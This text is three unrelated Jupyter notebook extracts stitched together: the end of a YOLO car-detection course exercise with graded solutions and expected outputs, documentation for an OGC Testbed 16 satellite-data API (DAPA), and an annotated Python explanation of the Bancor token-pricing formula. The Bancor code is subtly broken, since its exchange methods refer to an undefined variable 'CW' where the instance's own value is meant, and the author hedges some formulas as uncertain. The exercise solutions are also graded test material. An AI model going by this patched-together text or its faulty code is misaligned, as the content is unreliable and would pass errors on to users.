K.get_session().run(tf.variables_initializer([max_boxes_tensor])) # initialize variable max_boxes_tensor
# Use tf.image.non_max_suppression() to get the list of indices corresponding to boxes you keep
### START CODE HERE ### (≈ 1 line)
nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes, iou_threshold)
### END CODE HERE ###
# Use K.gather() to select only nms_indices from scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = K.gather(scores, nms_indices)
boxes = K.gather(boxes, nms_indices)
classes = K.gather(classes, nms_indices)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_b:
scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)
classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
6.9384
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[-5.299932 3.13798141 4.45036697 0.95942086]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
-2.24527
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
### 2.4 Wrapping up the filtering
It's time to implement a function taking the output of the deep CNN (the 19x19x5x85 dimensional encoding) and filtering through all the boxes using the functions you've just implemented.
**Exercise**: Implement `yolo_eval()` which takes the output of the YOLO encoding and filters the boxes using score threshold and NMS. There's just one last implementational detail you have to know. There're a few ways of representing boxes, such as via their corners or via their midpoint and height/width. YOLO converts between a few such formats at different times, using the following functions (which we have provided):
```python
boxes = yolo_boxes_to_corners(box_xy, box_wh)
```
which converts the yolo box coordinates (x,y,w,h) to box corners' coordinates (x1, y1, x2, y2) to fit the input of `yolo_filter_boxes`
```python
boxes = scale_boxes(boxes, image_shape)
```
YOLO's network was trained to run on 608x608 images. If you are testing this data on a different size image--for example, the car detection dataset had 720x1280 images--this step rescales the boxes so that they can be plotted on top of the original 720x1280 image.
Don't worry about these two functions; we'll show you where they need to be called.
```
# GRADED FUNCTION: yolo_eval
def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
"""
Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.
Arguments:
yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:
box_confidence: tensor of shape (None, 19, 19, 5, 1)
box_xy: tensor of shape (None, 19, 19, 5, 2)
box_wh: tensor of shape (None, 19, 19, 5, 2)
box_class_probs: tensor of shape (None, 19, 19, 5, 80)
image_shape -- tensor of shape (2,) containing the input shape, in this notebook we use (608., 608.) (has to be float32 dtype)
max_boxes -- integer, maximum number of predicted boxes you'd like
score_threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (None, ), predicted score for each box
boxes -- tensor of shape (None, 4), predicted box coordinates
classes -- tensor of shape (None,), predicted class for each box
"""
### START CODE HERE ###
# Retrieve outputs of the YOLO model (≈1 line)
box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs
# Convert boxes to be ready for filtering functions
boxes = yolo_boxes_to_corners(box_xy, box_wh)
# Use one of the functions you've implemented to perform Score-filtering with a threshold of score_threshold (≈1 line)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = score_threshold)
# Scale boxes back to original image shape.
boxes = scale_boxes(boxes, image_shape)
# Use one of the functions you've implemented to perform Non-max suppression with a threshold of iou_threshold (≈1 line)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes, max_boxes, iou_threshold)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_b:
yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1))
scores, boxes, classes = yolo_eval(yolo_outputs)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
138.791
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
54
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
<font color='blue'>
**Summary for YOLO**:
- Input image (608, 608, 3)
- The input image goes through a CNN, resulting in a (19,19,5,85) dimensional output.
- After flattening the last two dimensions, the output is a volume of shape (19, 19, 425):
- Each cell in a 19x19 grid over the input image gives 425 numbers.
- 425 = 5 x 85 because each cell contains predictions for 5 boxes, corresponding to 5 anchor boxes, as seen in lecture.
- 85 = 5 + 80 where 5 is because $(p_c, b_x, b_y, b_h, b_w)$ has 5 numbers, and and 80 is the number of classes we'd like to detect
- You then select only few boxes based on:
- Score-thresholding: throw away boxes that have detected a class with a score less than the threshold
- Non-max suppression: Compute the Intersection over Union and avoid selecting overlapping boxes
- This gives you YOLO's final output.
## 3 - Test YOLO pretrained model on images
In this part, you are going to use a pretrained model and test it on the car detection dataset. As usual, you start by **creating a session to start your graph**. Run the following cell.
```
sess = K.get_session()
```
### 3.1 - Defining classes, anchors and image shape.
Recall that we are trying to detect 80 classes, and are using 5 anchor boxes. We have gathered the information about the 80 classes and 5 boxes in two files "coco_classes.txt" and "yolo_anchors.txt". Let's load these quantities into the model by running the next cell.
The car detection dataset has 720x1280 images, which we've pre-processed into 608x608 images.
```
class_names = read_classes("model_data/coco_classes.txt")
anchors = read_anchors("model_data/yolo_anchors.txt")
image_shape = (720., 1280.)
```
### 3.2 - Loading a pretrained model
Training a YOLO model takes a very long time and requires a fairly large dataset of labelled bounding boxes for a large range of target classes. You are going to load an existing pretrained Keras YOLO model stored in "yolo.h5". (These weights come from the official YOLO website, and were converted using a function written by Allan Zelener. References are at the end of this notebook. Technically, these are the parameters from the "YOLOv2" model, but we will more simply refer to it as "YOLO" in this notebook.) Run the cell below to load the model from this file.
```
yolo_model = load_model("model_data/yolo.h5")
```
This loads the weights of a trained YOLO model. Here's a summary of the layers your model contains.
```
yolo_model.summary()
```
**Note**: On some computers, you may see a warning message from Keras. Don't worry about it if you do--it is fine.
**Reminder**: this model converts a preprocessed batch of input images (shape: (m, 608, 608, 3)) into a tensor of shape (m, 19, 19, 5, 85) as explained in Figure (2).
### 3.3 - Convert output of the model to usable bounding box tensors
The output of `yolo_model` is a (m, 19, 19, 5, 85) tensor that needs to pass through non-trivial processing and conversion. The following cell does that for you.
```
yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))
```
You added `yolo_outputs` to your graph. This set of 4 tensors is ready to be used as input by your `yolo_eval` function.
### 3.4 - Filtering boxes
`yolo_outputs` gave you all the predicted boxes of `yolo_model` in the correct format. You're now ready to perform filtering and select only the best boxes. Lets now call `yolo_eval`, which you had previously implemented, to do this.
```
scores, boxes, classes = yolo_eval(yolo_outputs, image_shape)
```
### 3.5 - Run the graph on an image
Let the fun begin. You have created a (`sess`) graph that can be summarized as follows:
1. <font color='purple'> yolo_model.input </font> is given to `yolo_model`. The model is used to compute the output <font color='purple'> yolo_model.output </font>
2. <font color='purple'> yolo_model.output </font> is processed by `yolo_head`. It gives you <font color='purple'> yolo_outputs </font>
3. <font color='purple'> yolo_outputs </font> goes through a filtering function, `yolo_eval`. It outputs your predictions: <font color='purple'> scores, boxes, classes </font>
**Exercise**: Implement predict() which runs the graph to test YOLO on an image.
You will need to run a TensorFlow session, to have it compute `scores, boxes, classes`.
The code below also uses the following function:
```python
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
```
which outputs:
- image: a python (PIL) representation of your image used for drawing boxes. You won't need to use it.
- image_data: a numpy-array representing the image. This will be the input to the CNN.
**Important note**: when a model uses BatchNorm (as is the case in YOLO), you will need to pass an additional placeholder in the feed_dict {K.learning_phase(): 0}.
```
def predict(sess, image_file):
"""
Runs the graph stored in "sess" to predict boxes for "image_file". Prints and plots the preditions.
Arguments:
sess -- your tensorflow/Keras session containing the YOLO graph
image_file -- name of an image stored in the "images" folder.
Returns:
out_scores -- tensor of shape (None, ), scores of the predicted boxes
out_boxes -- tensor of shape (None, 4), coordinates of the predicted boxes
out_classes -- tensor of shape (None, ), class index of the predicted boxes
Note: "None" actually represents the number of predicted boxes, it varies between 0 and max_boxes.
"""
# Preprocess your image
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
# Run the session with the correct tensors and choose the correct placeholders in the feed_dict.
# You'll need to use feed_dict={yolo_model.input: ... , K.learning_phase(): 0})
### START CODE HERE ### (≈ 1 line)
out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes], feed_dict={yolo_model.input: image_data , K.learning_phase(): 0})
### END CODE HERE ###
# Print predictions info
print('Found {} boxes for {}'.format(len(out_boxes), image_file))
# Generate colors for drawing bounding boxes.
colors = generate_colors(class_names)
# Draw bounding boxes on the image file
draw_boxes(image, out_scores, out_boxes, out_classes, class_names, colors)
# Save the predicted bounding box on the image
image.save(os.path.join("out", image_file), quality=90)
# Display the results in the notebook
output_image = scipy.misc.imread(os.path.join("out", image_file))
imshow(output_image)
return out_scores, out_boxes, out_classes
```
Run the following cell on the "test.jpg" image to verify that your function is correct.
```
out_scores, out_boxes, out_classes = predict(sess, "test.jpg")
```
**Expected Output**:
<table>
<tr>
<td>
**Found 7 boxes for test.jpg**
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.60 (925, 285) (1045, 374)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.66 (706, 279) (786, 350)
</td>
</tr>
<tr>
<td>
**bus**
</td>
<td>
0.67 (5, 266) (220, 407)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.70 (947, 324) (1280, 705)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.74 (159, 303) (346, 440)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.80 (761, 282) (942, 412)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.89 (367, 300) (745, 648)
</td>
</tr>
</table>
The model you've just run is actually able to detect 80 different classes listed in "coco_classes.txt". To test the model on your own images:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the cell above code
4. Run the code and see the output of the algorithm!
If you were to run your session in a for loop over all your images. Here's what you would get:
<center>
<video width="400" height="200" src="nb_images/pred_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Predictions of the YOLO model on pictures taken from a camera while driving around the Silicon Valley <br> Thanks [drive.ai](https://www.drive.ai/) for providing this dataset! </center></caption>
<font color='blue'>
**What you should remember**:
- YOLO is a state-of-the-art object detection model that is fast and accurate
- It runs an input image through a CNN which outputs a 19x19x5x85 dimensional volume.
- The encoding can be seen as a grid where each of the 19x19 cells contains information about 5 boxes.
- You filter through all the boxes using non-max suppression. Specifically:
- Score thresholding on the probability of detecting a class to keep only accurate (high probability) boxes
- Intersection over Union (IoU) thresholding to eliminate overlapping boxes
- Because training a YOLO model from randomly initialized weights is non-trivial and requires a large dataset as well as lot of computation, we used previously trained model parameters in this exercise. If you wish, you can also try fine-tuning the YOLO model with your own dataset, though this would be a fairly non-trivial exercise.
**References**: The ideas presented in this notebook came primarily from the two YOLO papers. The implementation here also took significant inspiration and used many components from Allan Zelener's github repository. The pretrained weights used in this exercise came from the official YOLO website.
- Joseph Redmon, Santosh Divvala, Ross Girshick, Ali Farhadi - [You Only Look Once: Unified, Real-Time Object Detection](https://arxiv.org/abs/1506.02640) (2015)
- Joseph Redmon, Ali Farhadi - [YOLO9000: Better, Faster, Stronger](https://arxiv.org/abs/1612.08242) (2016)
- Allan Zelener - [YAD2K: Yet Another Darknet 2 Keras](https://github.com/allanzelener/YAD2K)
- The official YOLO website (https://pjreddie.com/darknet/yolo/)
**Car detection dataset**:
<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" property="dct:title">The Drive.ai Sample Dataset</span> (provided by drive.ai) is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>. We are especially grateful to Brody Huval, Chih Hu and Rahul Patel for collecting and providing this dataset.
| github_jupyter |
# DAPA Evaluation Workshop: Introduction & Documentation
## Introduction
Welcome the OGC Testbed 16 DAPA evaluation workshop. With this Jupyter Notebook we (EOX IT Services and the German Aerospace Center - DLR) would like to provide you some introduction material, links to Jupyter Notebooks, and a documentation about our API definition.
Our DAPA service endpoint is based on the EuroDataCube environment, which allows us to provide acess to a wide range of datasets:
- Sentinel-1 GRD
- Sentinel-2 L1C and L2A
- Sentinel-3 OLCI and SLSTR
- Sentinel-5P L2
- Landsat-8 L1C (ESA archive)
- MODIS
- DEM
Please see the Jupyter Notebooks for working examples. You can also use the DAPA service endpoint from your own environment (e.g., local computer, server). But please make sure, you do not publish the DAPA service endpoint URL (DAPA_URL) as this is connected to your personal account.
**Please note:** Not any feature of the API is currently supported. The API might also not work with every dataset. It should work at least with Sentinel-1, Sentinel-2, Sentinel-3, and the Digital Elevation Model (DEM).
## Tutorials
We have made the following tutorials as Jupyter Notebooks available:
1. [DAPA Tutorial #1: Cube - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_1_-_Cube_-_Sentinel-2.ipynb)
2. [DAPA Tutorial #2: Area - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_2_-_Area_-_Sentinel-2.ipynb)
3. [DAPA Tutorial #3: Timeseries - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_3_-_Timeseries_-_Sentinel-2.ipynb)
4. [DAPA Tutorial #4: Value - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_4_-_Value_-_Sentinel-2.ipynb)
5. [DAPA Tutorial #5: DEM example – OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_5_-_DEM.ipynb)
## Documentation
This API definition has been developed by EOX and DLR. This definition focuses on the provision of raster/coverage data, but might also be applied for scattered time-series data.
**Please note:** This is an early draft proposal of the API definition. It is subject to change within the time frame of OGC Testbed 16. Also other proposals exist with different API definitions.
**Overview of URL endpoints:**
/oapi/collections/{collection}/dapa/
fields/
cube/
area/
timeseries/
area/
position/
value/
area/
position/
The first hierarchy level after /dapa/ describes the output type of the data requested (except for "fields"):
- cube: 2d raster time-series (each with one or multiple bands)
- area: Single 2d raster (with one or multiple bands)
- timeseries: 1d time-series (each with values from one or multiple fields)
- value: Single value (with values from one or multiple fields)
The second hierarchy level after /dapa/ describes the input geometry (if not implicitly given from the output type):
- area: Polygon/Bounding box
- position: Point
With this definition, aggregation is automatically conducted based on the `aggregate` parameter to achieve
the output type requested (see the Parameter section below).
### /collections/{collection}/dapa/fields
Output fields/variables/properties/bands to be included in the request/processing/aggregation.
The `fields` parameter for the DAPA request can consists values either from the selected collection (e.g., all band
names from Sentinel-2) or declared dynamically (e.g., bands algebra NDVI=(B08-B04/B08+B04)) (see the Parameter
section below).
### /collections/{collection}/dapa/cube
**2d raster time-series** (each with one or multiple bands)
- Available only if the collection is a multi-temporal raster dataset.
**Parameters:**
- bbox/geom/cell
- time
- (fields) defaults to all fields (bands) available
- format
**Example UC 1.1:** Produce an animated video of ozone concentration from Sentinel-5p for a given time and space
/collections/S5PL2/dapa/cube?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&fields=SO2&format=video/avi
Results in an animated video.
**Example UC 2.1:** Retrieve a raster time-series of NDVI calculated from Sentinel-2 scenes for a given time and space
/collections/S2L1C/dapa/cube?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&fields=NDVI=(B08-B04/B08+B04)&format
=application/metalink
Results in a metalink file with download links to multiple raster files (one per time).
### /collections/{collection}/dapa/area
**Single 2d raster** (e.g., results in TIFF with num(aggregates) x num(fields) bands)
- If the collection is a **multi-temporal raster dataset**, **aggregation over time** is automatically conducted
based on the `aggregate` parameter.
- If the collection is a **single raster dataset**, **no aggregation over time** is conducted.
**Parameters:**
- bbox/geom/cell
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to image/tiff
**Example UC 1.2:** Retrieve the maximum sulphor dioxide concentration in a given time span as a single coverage
(aggregation over time)
/collections/S5PL2/dapa/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=max&fields=SO2
Results in TIFF with a single field/band: SO2_max
**Example UC 2.2:** Retrieve the minimum and maximum NDVI and NDBI in a given time span (aggregation over time)
/collections/S2L2A/dapa/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=min,max&fields=NDVI=(B04-B08)/(B04+B08),NDBI=(B01-B02)/(B01+B02)
Results in TIFF with 4 fields/bands: NDVI_min, NDVI_max, NDBI_min, NDBI_max.
### /collections/{collection}/dapa/timeseries
#### /collections/{collection}/dapa/timeseries/area
**1d time-series** (each with values from one or multiple fields)
- If the collection is a **multi-temporal raster dataset**, **aggregation over space** is automatically conducted
base on the `aggregate` parameter.
- Can not be used for a single raster dataset
**Parameters:**
- bbox/geom/cell
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to text/csv
**Example UC 1.3:** Retrieve the maximum sulphor dioxide concentration in a given area as a time-series (aggregation
over space)
/collections/S5PL2/dapa/timeseries/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=max&fields=SO2
Results in CSV with two columns: date and SO2_max
#### /collections/{collection}/dapa/timeseries/position
**1d time-series** (each with values from one or multiple fields)
- Extraction of a time series at a point specified in the request
- No aggregation is conducted because only a single pixel is extracted
- Can not be used for a single raster dataset
**Parameters:**
- point
- time
- (fields) defaults to all fields (bands) available
- (format) defaults to text/csv
**Example UC 1.3:** Retrieve the maximum sulphor dioxide concentration at a given point as a time-series
/collections/S5PL2/dapa/timeseries/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&point=11.49,48.05&fields=SO2
Results in CSV with two columns: date and SO2
### /collections/{collection}/dapa/value
#### /collections/{collection}/dapa/value/area
**Single value** (with values from one or multiple fields)
- If the collection is a multi-temporal dataset, **aggregation over space and time** is automatically conducted base on
the `aggregate` parameter.
- If the collection is a single dataset/coverage, **aggregation over space** is automatically conducted base on
the `aggregate` parameter.
**Note:** If multiple methods are given in the `aggregate` parameter or multiple `fields` are given, text/plain is not
sufficient! `TODO`
**Parameters:**
- bbox/geom/cell
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to text/plain
**Example:** Retrieve the minimum sulphor dioxide concentration in a given area and time span (aggregated over space and
time)
/collections/S5PL2/value/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=min&fields=SO2&format=text/plain
Results in a single value
#### /collections/{collection}/dapa/value/position
**Single value** (with values from one or multiple fields)
- If the collection is a **multi-temporal raster dataset**, **aggregation over time** is automatically conducted
based on the `aggregate` parameter.
- If the collection is a **single raster dataset**, **no aggregation** is conducted.
**Note:** If multiple methods are given in the `aggregate` parameter or multiple `fields` are given, text/plain is not
sufficient! `TODO`
**Parameters:**
- point
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to text/plain
**Example:** Retrieve the minimum value of all fields (bands) of Sentinel-5p at a given point in a given time
span (aggregated over time).
/collections/S5PL2/value/position?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&point=11.49,48.05&aggregate=min&format=application/json
Results in JSON file with a single value for each field (band): SO2_min, O3_min, NO2_min, ...
### Parameters
#### `point`
Specific location in `x,y`, WKT (?), or reference to point (Link to feature?) `TODO`
**Example:**
&point=14.2,15.3
#### `bbox`
Bounding box in `minx,miny,maxx,maxy` or reference to geometry (Link to feature?) `TODO`
**Example:**
&bbox=12.3,0.3,14.4,2.3
### `geom`
WKT geometry or reference to geometry (Link to feature?) `TODO`
**Example:**
&geom=POLYGON ((...))
#### `time`
Time point or time span
**Examples:**
Start/End
&time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z
Instant
&time=2018-05-04T12:12:12Z
Start and period after (not yet supported)
&time=2018-05-04T12:12:12Z/P5D
End and period before (not yet supported)
&time=P5D/2018-05-04T12:12:12Z
Whole day
&time=2018-05-04
Whole month
&time=2018-05
Whole year
&time=2018
#### `fields`
Comma-separated list of fields, derived (calculated) fields are possible
**Syntax:**
field-parameter = field-selection , { ',' , field-selection }
field-selection = identifier | ( identifier , '=' , expression )
**Please note:** + sign need to be URL encoded to %2B
**Examples:**
Listing:
&fields=B04,B08
Simple aliasing:
&fields=NIR=B08,RED=B04
Derived field:
&fields=NDVI=(B04-B08)/(B04+B08)
Combined example:
&fields=NIR=B08,RED=B04,NDVI=(RED-NIR)/(RED+NIR)
#### `aggregate`
Specify aggregation
**Syntax:**
aggregate-param = method { ',' , method }
method = identifier [ '(' , method-arg , ')' ]
**Examples:**
Aggregation (min+max)
aggregate=max,min
Aggregation (min+max+linear average) (`avg(linear)` not yet supported - only avg)
aggregate=max,min,avg(linear)
#### `cql` (not yet supported)
Metadata filter using CQL
**Example:**
cql=cloudCover < 0.5
#### `datafilter` (not yet supported)
**Syntax:**
datafilter-parameter = datafilter , { ',' , datafilter }
datafilter = boolean-expression
**Example:**
datafilter=area(NDVI > 1) >= 0.5
#### `format` (not yet supported)
##### cube formats (~3D)
- AVI
- application/x-netcdf
- application/metalink
- WCS-EO DatsetSeries / CIS
##### coverage (~2D)
- image/tiff
##### timeseries (~1D)
- text/csv
- application/json
##### value (~0D)
- text/plain
- application/json
| github_jupyter |
# The Bancor Protocol
Based on the whitepaper from: Eyal Hertzog, Guy Benartzi, Galia Benartzi, "The Bancor Protocol" March, 2018
8/22/18
Written for: [Horuspay.io](https://horuspay.io/)
By: gunnar pope
* github: https://github.com/gunnarpope
* email: gunnarpope@gmail.com
Forward: This script in intended to explore and expand upon the brilliance of the Bancor Protocol Algorithm presented by Hertzong, et al. Any critiques provided below are intended to build upon and clarify their work. -gp
### Definitions and notes on the Bancor Algorithm:
* $TOK$ is the your native Smart Token symbol, which could be HORUS for example
* $CTOK$ is the connector token that you wish to transfer, which could be EOS, BTC, or even ETH, if desired.
* [USD/TOK] the brakets indicate only the units of the variable, in this case the unit is USD/TOK
* From the whitepaper, "The price of a Smart Token is denominated in the connected token (for example, the price of BNT is denominated in ETH, its connected token"
* 'The bancor formula is built upon the idea that the smart contract maintains a ratio between the total value and the connector valance, the connector weight.'
### Total Smart Token Supply
The Smart Token Total Supply, $totalTOKsupply$, is the maximum amount of Smart Tokens of your contract to ever be created.
### Smart Token Market Cap
The total market capitalization of the Smart Token, $TOK$, is the total value of the $TOK$ market, in reference of the connector token, $CTOK$. The $TOKmarketCap$ variable must be in units of [CTOK] for $CW$ to be a unitless number. Therefore, the whitepaper formula for $TOKmarketCap$ should be modified to be:
$$TOKmarketcap [CTOK]= price [CTOK/TOK]*totalTOKsupply[TOK]$$
For instance, if the total supply of EOS ever created was 1000 EOS, than the $TOKmarketcap$ would be:
$$ TOKmarketcap = 0.00074823558[BTC/EOS] * 1000 EOS = 0.74680 BTC $$.
### Connector Weight
From the Price Formula algorithms:
$$ CW = \frac{CTOKbalance [CTOK]}{TOKmarketcap [CTOK]}$$
where:
Where, $CTOKbalance$ is the balance of the tokens in the connector account.
A few small notes:
* The whitepaper states that: "The CW is expressed as a percentage greater than 0% and up to 100%, and as mentioned, is initially set by the creator when a Smart Token is configured."
If this were true, and $CTOKbalance$ and $TOKmarketcap$ are of the same units, than the equation for $CW$ would have to be:
$$ CW = \frac{CTOKbalance [CTOK]}{TOKmarketcap [CTOK]}*100$$
But this would scale $price$ calculation to be artificially low (I think), so it is probably ranging between $0 < CW < 1$.
### Smart Token Price
The price of the smart token is denominated (referrenced to) the connector token. For example, if EOS is the Smart token and BTC is the connector token, and 1 EOS = 0.00074823558 BTC, than the units of $price$ are:
$$ price = 0.00074823558 [BTC/EOS]$$.
In reference to this algorithm, the units of price are.
$$ price = XX.XXXX [CTOK/TOK]$$
Solve for the Smart Token's price as a function of it's connector weight, $CW$, connector balance, $CTOKbalance$, and Smart Token supply, $TOKsupply$. The $Smart Token Outstanding Supply$ is not defined in the Bancor whitepaper, but we're assuming it represents available supply of $TOK$ to the smart contract, $TOKsupply$. This $TOKsupply$ would have to be a liquid balance of $TOK$, owned by the Smart Contract administrators, to be usefully traded.
$$ price [CTOK/TOK] = \frac{CTOKBalance [CTOK]}{TOKsupply [TOK]*CW}$$
This formula implies that if there is a large outstanding supply (low demand), the token will be worth a fraction of it's marketcap price and if only a few tokens are available in supply (high demand), each token will be worth nearly the marketcap price.
#### Tokens Issued
$$ TOKissued [TOK] = TOKsupply [TOK]*\big((1+(\frac{CTOKrecieved [CTOK]}{CTOKbalance [CTOK]})^{CW}-1\big)$$
This is the amount of Smart Tokens to payout given the current smart token supply, $TOKsupply$, the connected tokens paid, $CTOKrecieved$, and the balance of $CTOK$ tokens in the bancor account, $CTOKbalance$.
$$ CTOKissued = CTOKbalance * ((1+ \frac{TOKrecieved}{TOKsupply})^{\frac{1}{CW}}-1) $$
The effective price can be calculated as:
$$ effectivePrice [CTOK/TOK] = \frac{CTOKexchanged [CTOK]}{TOKexchanged [TOK]}$$
The $effectivePrice$ represents the effective exchange rate of the transaction, in units of $[CTOK/TOK]$
```
# The Bancor Algorithm and testing
class smart_token:
def __init__(self, name, supply, totalsupply):
self.name = name #"TOK"
self.supply = supply #[TOK] circulating supply
self.totalsupply = totalsupply #[TOK] total TOK created
def printtok(self):
print("Token Stats:")
print("Token: ", self.name)
print("Supply: ", self.supply)
print("totalsupply: ", self.totalsupply)
class connector:
def __init__(self, tokenname, balance):
self.token = tokenname # name="CTOK", for example
self.balance = balance # [CTOK] balance
def printcon(self):
print("Connector Stats:")
print("Token: ", self.token)
print("Balance: ", self.balance)
class BancorExchange:
def __init__(self, CW):
self.CW = CW
self.price = 0.0
self.effective_price = 0.0
def printf(self):
print("CW: ", self.CW)
print("Price: ", self.price)
def CTOKtoTOK(self, tok, ctok, CTOKreceived):
# get TOK supply
TOKsupply = tok.totalsupply
# get price
self.price = self.getprice(tok, ctok)
# get TOKmarketcap
marketcap = self.marketcap(self.price, tok.totalsupply)
# compute TOKissued
TOKissued = self.TOKissued(TOKsupply, ctok.balance, CTOKreceived, CW)
# compute the effective price
# remove TOK from TOKbalance
tok.supply -= TOKissued
# add CTOK to CTOKbalance
ctok.balance += CTOKreceived
# calculate the effective price
self.effective_price = CTOKreceived/ (1.0*TOKissued)
# update the new marketcap
newmarketcap = self.marketcap(self.effective_price, tok.totalsupply)
# update the CW
self.CW = self.updateCW(ctok.balance, newmarketcap)
# return TOKissued and effective price
return (TOKissued)
def TOKtoCTOK(self, tok, ctok, TOKreceived):
# get price
self.price = self.getprice(tok, ctok)
# get TOKmarketcap
marketcap = self.marketcap(self.price, tok.totalsupply)
# compute CTOKissued
CTOKissued = self.CTOKissued(tok.totalsupply, ctok.balance, TOKreceived, CW)
# remove TOK from TOKbalance
ctok.balance -= CTOKissued
# add CTOK to CTOKbalance
tok.supply += TOKreceived
# calculate the effective price
self.effective_price = CTOKissued/ (1.0*TOKreceived)
# update the new marketcap
newmarketcap = self.marketcap(self.effective_price, tok.totalsupply)
# update the CW
self.CW = self.updateCW(ctok.balance, newmarketcap)
# return TOKissued and effective price
return (CTOKissued)
def updateCW(self, CTOKbalance, TOKmarketcap):
CW = CTOKbalance / TOKmarketcap
return (CW)
def getprice(self, tok, ctok):
balance = ctok.balance
TOKsupply = tok.supply
price = balance/(TOKsupply*self.CW)
# print("Price [EOS/HOR]:", price)
return ( price )
def marketcap(self,price, totalTOKsupply):
marketcap = price * totalTOKsupply
return ( marketcap )
def CTOKissued(self, TOKsupply, CTOKbalance, TOKreceived, CW ):
ctokissued = CTOKbalance * (( 1 + TOKreceived/TOKsupply)**(1/CW)-1 )
return ( ctokissued )
def TOKissued(self, TOKsupply, CTOKbalance, CTOKreceived, CW):
tokensissued = TOKsupply*( (1+CTOKreceived/CTOKbalance)**(CW) -1)
return( tokensissued )
